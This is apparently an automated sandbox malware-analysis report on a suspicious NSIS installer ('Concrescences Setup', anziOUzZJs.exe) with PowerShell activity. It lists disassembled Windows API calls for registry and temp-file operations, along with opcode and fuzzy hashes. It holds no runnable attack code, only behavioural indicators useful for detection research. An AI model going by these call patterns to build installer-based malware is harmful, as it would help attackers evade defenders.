                                      • lstrlenA.KERNEL32(Concrescences Setup: Completed,Concrescences Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                      • wsprintfA.USER32 ref: 00404779
                                      • SetDlgItemTextA.USER32(?,Concrescences Setup: Completed), ref: 0040478C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$Concrescences Setup: Completed
                                      • API String ID: 3540041739-96654304
                                      • Opcode ID: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                      • Instruction ID: 079308417c3a62341de1df324b483ce4e469374b9790fc4fe8de96a48b85a08e
                                      • Opcode Fuzzy Hash: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                      • Instruction Fuzzy Hash: F011A573A0412837EB0065699C45EAF3298DB86374F254637FA25F71D2EA788C5245A8
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 1356686001-3559984709
                                      • Opcode ID: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
                                      • Instruction ID: 26fcae0a7b2a502e926faea7c6e927eea7b3aae3134fdb689c9e3a18d41500d2
                                      • Opcode Fuzzy Hash: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
                                      • Instruction Fuzzy Hash: 3E1145B1E00108BFEB10AFA5EE89EAF767DEB54358F10403AF505B71D1D6B85D419B28
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
                                      • Instruction ID: feb6aed171ad8b85e204e5b4e2feb4536d295dbd67c3687bd8867431d3a466b7
                                      • Opcode Fuzzy Hash: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
                                      • Instruction Fuzzy Hash: 53117F71A00108FFDF229F90DE89EAE3B7DEB54349B104076FA01B10A0D7749E51DB69
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
                                      • Instruction ID: 14b9f5ff68e8b0ed0f2204d74c17d06140583eb6ed2bbf798243b331d3a4cd3b
                                      • Opcode Fuzzy Hash: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
                                      • Instruction Fuzzy Hash: A9F0E7B2A04114AFEB01ABE4DE88DAFB7BDEB54305B10447AF602F6191C7789D018B79
                                      APIs
                                      • SetWindowTextA.USER32(00000000,00422F00), ref: 004039D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$1033$Concrescences Setup: Completed
                                      • API String ID: 530164218-3068180551
                                      • Opcode ID: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                      • Instruction ID: 79edc1b1becbb318b5d11430581b7fe373163fbdb48c995140def98ab9010f1e
                                      • Opcode Fuzzy Hash: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                      • Instruction Fuzzy Hash: B311F3F1B04611ABCB20DF14DD809737BADEBC4756328823FE941A73A0C67D9D029B98
                                      APIs
                                        • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                        • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058AC
                                      • GetFileAttributesA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 004058BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 3248276644-386598902
                                      • Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                      • Instruction ID: 1d2993da53655c0900dfa7f8eb6ffa86a16769ab8224128061af08a25d69d353
                                      • Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                      • Instruction Fuzzy Hash: 16F0F427105E5165DA22323B1C05B9F1A44CD86354718C53BFC51F22D2DA3CC8629DBE
                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030C6,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405771
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030C6,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 0040577A
                                      • lstrcatA.KERNEL32(?,00409014), ref: 0040578B
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040576B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 2659869361-2382934351
                                      • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                      • Instruction ID: 00e6a1abdfef3fccf4d12e3b382aa79108487555f8088e95eeaee7bf5793dfbe
                                      • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                      • Instruction Fuzzy Hash: 94D0A9B2A05A307AD3122715AC0DE8B2A08CF82300B094023F200B72A2CB3C1D418BFE
                                      APIs
                                      • CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                      • CharNextA.USER32(00000000), ref: 00405817
                                      • CharNextA.USER32(00000000), ref: 0040582B
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp, xrefs: 00405805
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 3213498283-3559984709
                                      • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                      • Instruction ID: 4ca260c7e1a22d06af12069221c3406c2bee361732d71c1e98a9e22686a99acb
                                      • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                      • Instruction Fuzzy Hash: 71F0C253908F942BFB3276641C44B675F88DB55350F04C07BEA80B62C2C6788860CBEA
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                      • GetTickCount.KERNEL32 ref: 00402C33
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                      • Instruction ID: 69bd14cd8f1a0d496662edafeb8c2727d8675a530a128bc1770b64b88ff4c26b
                                      • Opcode Fuzzy Hash: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                      • Instruction Fuzzy Hash: 2CF05E7090A220ABD6217F64FE0CDDF7BA4FB41B527018576F144B21E4C379988ACB9D
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00404EB5
                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F06
                                        • Part of subcall function 00403F2A: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                      • Instruction ID: f49a9e3fcece2dd6490d1841f3d0f5b5163df4d3f93a23d44cf999a9bd086e10
                                      • Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                      • Instruction Fuzzy Hash: D10171B110020EABDF209F11DC84A9B3725FBC4754F208037FB11761D1DB799C61A7A9
                                      APIs
                                      • FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,004035BC,004033D6,?), ref: 004035FE
                                      • GlobalFree.KERNEL32(?), ref: 00403605
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 1100898210-2382934351
                                      • Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                      • Instruction ID: f6c6d059f9b75f5cc6a79e0049e3afa1176d7e4558308c53008dbe788c85df41
                                      • Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                      • Instruction Fuzzy Hash: 3EE0C2338100206BC7211F0AED04B5E77AC6F48B22F054066FC407B3A08B742C418BCC
                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 004057B8
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 004057C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-3976562730
                                      • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                      • Instruction ID: 15550f116ff3ce815c4487a542d9ae56249738f0e4d38f85a76656e2d55d0e49
                                      • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                      • Instruction Fuzzy Hash: FAD0C7B2409D705EF31353149C08B9F6A58DF16700F195463E141EB591C6785D415BBD
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058F9
                                      • CharNextA.USER32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590A
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                      • Instruction ID: 481a9c588bbd1c68550dea5b76d7ebd72626077616c8f786d6c844a28ee3c139
                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                      • Instruction Fuzzy Hash: 9EF0F632504418FFCB02AFA5DC0099EBBA8EF46360B2540B9F800F7310D274EF01ABA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q$4'q
                                      • API String ID: 0-3272727544
                                      • Opcode ID: 6db3b085bc0ed8b7d4c7f84cf7a8a1e77bd01a6866f1b13e94b7f3f20c099b57
                                      • Instruction ID: 4b43ede1552a945373b8f315723f0079bf05f2b4f2c9c840512e79f0f3d5f28b
                                      • Opcode Fuzzy Hash: 6db3b085bc0ed8b7d4c7f84cf7a8a1e77bd01a6866f1b13e94b7f3f20c099b57
                                      • Instruction Fuzzy Hash: 79F24EB5A10315DFE724DB64C950BEEB7B2EB89304F5080A9D4096B391CB76ED81CFA1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c072b47c6415e336bd25511f5dfcc6a33f0d2fbc796b7be3b0186d1d616f0df
                                      • API String ID:
                                      • Opcode ID: 7f5e9d348dee89ba5c9fc14ef5ec605fd641073a89cf6e382f0c4817119ceda8
                                      • Instruction ID: 2f96acf33bbe3b5535d3e07165f5648521aaf47417b66f63f2d6a120723b0407
                                      • Opcode Fuzzy Hash: 7f5e9d348dee89ba5c9fc14ef5ec605fd641073a89cf6e382f0c4817119ceda8
                                      • Instruction Fuzzy Hash: 9D81A034A05258DFCB15CBA9D4809EEFBF6EF89311F1480AAE454AB362D731AD45CF60
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00717eb36748602c1b53189d421a2d35e96c9ab9650ed1198be645ee85c5fc5d
                                      • Instruction ID: 8a3b09c337293fe45780c5dc0c77266ee310e44cd8ed4e88cdff7ec01910e127
                                      • Opcode Fuzzy Hash: 00717eb36748602c1b53189d421a2d35e96c9ab9650ed1198be645ee85c5fc5d
                                      • Instruction Fuzzy Hash: 8F819034A042158FDB15DBA8D890AAEBBF3FF89301F148569D405AB395DB34DC46CFA1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81fe40c856f948f734cc4a267a6347ce2f7b4b90b3c1d083487c5c9ef341f11b
                                      • Instruction ID: f98d874414a21097275be6faf6d71360dc4fb7e1b4225a79fc2880cc36d284b0
                                      • Opcode Fuzzy Hash: 81fe40c856f948f734cc4a267a6347ce2f7b4b90b3c1d083487c5c9ef341f11b
                                      • Instruction Fuzzy Hash: E2916AB0A20206DFDB14CB55C144BAAB7B2AF89314F14809AE4056B392C772ED91CFA1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08e8076d896aa1766b3733e67e6816c36841f6fe2d1ef903cd1d7419ef1fe326
                                      • Instruction ID: dddc28a515ea21903d7705b1e35cd026c731110dc87156d49c2eece7f6f6c902
